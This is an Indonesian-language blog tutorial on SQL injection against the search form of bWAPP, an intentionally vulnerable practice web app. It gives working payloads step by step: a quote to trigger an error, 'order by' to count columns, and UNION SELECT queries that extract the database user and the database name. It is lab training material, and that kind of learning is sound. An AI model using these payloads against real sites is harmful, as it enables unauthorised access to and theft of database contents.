Kembali lagi bersama gue disini :D
Sorry jarang upload tutor, karna admin masih sibuk :D
Kali ini gue ingin share tutorial SQL Injection (GET/Search) ~ ( bWAPP )
Pertama gue jelasin dulu apa itu bWAPP
bWAPP, atau aplikasi web buggy, adalah aplikasi web gratis dan open source yang tidak aman. Ini membantu penggemar keamanan, pengembang dan siswa untuk menemukan dan mencegah kerentanan web. bWAPP menyiapkan seseorang untuk melakukan pengujian penetrasi yang berhasil dan proyek peretasan etis.
Dikutip dari website resmi bWAPP http://www.itsecgames.com
Lalu bagaimana cara installnya?
silahkan cari sendiri di google ya
Langsung aja
SQL Injection (GET/Search) ~ ( bWAPP )
Bagaimana mencari Vulnerability SQLI pada form search?
apabila kita mencari dengan secara random, maka yg muncul adalah
Sekarang kita coba inject
dengan mencoba menginput 1' di form search tersebut
maka hasilnya
Muncul sebuah error sql syntax
Selanjutnya kita cari order by nya error di column berapa
1' order by 8-- -
Yap di order 8 muncul error
Selanjutnya kita cari nomor ajaibnya, union select nya di angka 7
1' union all select 1,2,3,4,5,6,7-- -
Angka ajaib ada di nomor 2, langsung saja kita mencari usernya dengan cara
1' union all select 1,user(),3,4,5,6,7-- -
Usernya : root@localhost
Selanjutnya cari databasenya
1' union all select 1,database(),3,4,5,6,7-- -
Databasenya : bwapp
Ok sekian dulu tutorialnya, sampai jumpa di tutorial berikutnya :D